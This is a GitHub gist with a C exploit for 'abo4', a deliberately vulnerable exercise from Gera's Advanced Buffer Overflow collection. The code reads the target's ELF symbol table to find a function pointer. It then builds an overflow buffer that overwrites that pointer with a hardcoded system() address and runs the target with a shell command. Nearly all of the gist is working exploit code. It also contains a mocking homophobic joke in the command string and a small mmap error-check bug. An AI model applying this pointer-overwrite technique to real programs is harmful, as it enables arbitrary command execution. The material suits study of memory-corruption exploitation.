Skip to content

Instantly share code, notes, and snippets.

@gagomes
Created January 5, 2018 02:11
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save gagomes/fcef12ffe7868e5ec8cb52755c8af7ab to your computer and use it in GitHub Desktop.
Save gagomes/fcef12ffe7868e5ec8cb52755c8af7ab to your computer and use it in GitHub Desktop.
A no-bruteforce exploit against abo4 from the "Advanced Buffer Overflow" collection by Gera, written sometime circa 2002--2003
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <elf.h>
#include <link.h>
#include <assert.h>
#define ABO "abo4"
#if !defined(__linux__) || !defined(__i386__)
#error @#$%!
#endif
void hexdump(unsigned char *data, int size)
{
int i, j = 0;
printf("--begin dump--\n");
for (i = 0; i < size; i++, j += 3) {
if (j && !(j % 26))
printf("\n");
printf("%02x ", data[i]);
}
printf("\n--end dump--\n");
}
int main(int argc, char **argv)
{
unsigned char *elf;
char *symstr;
Elf32_Ehdr *ehdr;
Elf32_Shdr *shdr, *sec;
Elf32_Sym *sym;
int nsym;
struct stat st;
int fd, n, i;
fd = open(ABO, O_RDONLY);
if (fd < 0)
return printf("open: %s\n", strerror(errno));
n = fstat(fd, &st);
if (n < 0)
return printf("fstat: %s\n", strerror(errno));
elf = mmap(0, st.st_size, PROT_READ, MAP_SHARED, fd, 0);
if (ehdr == MAP_FAILED)
return printf("mmap: %s\n", strerror(errno));
ehdr = (Elf32_Ehdr *) &elf[0];
shdr = (Elf32_Shdr *) &elf[ehdr->e_shoff];
for (i = 0; i < ehdr->e_shnum; i++)
if (shdr[i].sh_type == SHT_SYMTAB)
break;
if (shdr[i].sh_type != SHT_SYMTAB)
return printf("unable to find teh symbol table\n");
sec = (Elf32_Shdr *) &elf[ehdr->e_shoff];
sym = (Elf32_Sym *) &elf[shdr[i].sh_offset];
symstr = (char *) &elf[sec[shdr[i].sh_link].sh_offset];
nsym = shdr[i].sh_size / sizeof(Elf32_Sym);
for (i = 0; i < nsym; i++)
if (!memcmp(&symstr[sym[i].st_name], "fn", 2))
break;
assert(!memcmp(&symstr[sym[i].st_name], "fn", 2));
{
unsigned int poke_addr = sym[i].st_value;
unsigned int system_addr = 0x4006b974;
Elf32_Sym *ref = NULL;
char argv1[261];
char argv2[5];
char argv3[] = "echo s33k is gay \\;\\]\n";
char *e_argv[5];
extern struct link_map *_dl_loaded;
struct link_map *lmap;
printf("%p\n", (void *)&system);
// lmap = _dl_lookup_symbol("system", _dl_loaded, &ref,
// _dl_loaded->l_scope, 0, 0);
memset(argv1, 0x0, sizeof argv1);
memset(argv2, 0x0, sizeof argv2);
for (i = 0; i < sizeof(argv1) - 1; i++)
argv1[i] = 0x41;
printf("poke_addr = 0x%08x\n", poke_addr);
printf("system = 0x%08x\n", system_addr);
i -= 5;
argv1[++i] = (poke_addr >> 0x00) & 0xff;
argv1[++i] = (poke_addr >> 0x08) & 0xff;
argv1[++i] = (poke_addr >> 0x10) & 0xff;
argv1[++i] = (poke_addr >> 0x18) & 0xff;
//hexdump(&argv1[0], sizeof argv1);
argv2[0] = (system_addr >> 0x00) & 0xff;
argv2[1] = (system_addr >> 0x08) & 0xff;
argv2[2] = (system_addr >> 0x10) & 0xff;
argv2[3] = (system_addr >> 0x18) & 0xff;
//hexdump(&argv2[0], sizeof argv2);
e_argv[0] = ABO;
e_argv[1] = &argv1[0];
e_argv[2] = &argv2[0];
e_argv[3] = &argv3[0];
e_argv[4] = NULL;
printf("executing...\n");
execve("./abo4", e_argv, NULL);
}
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment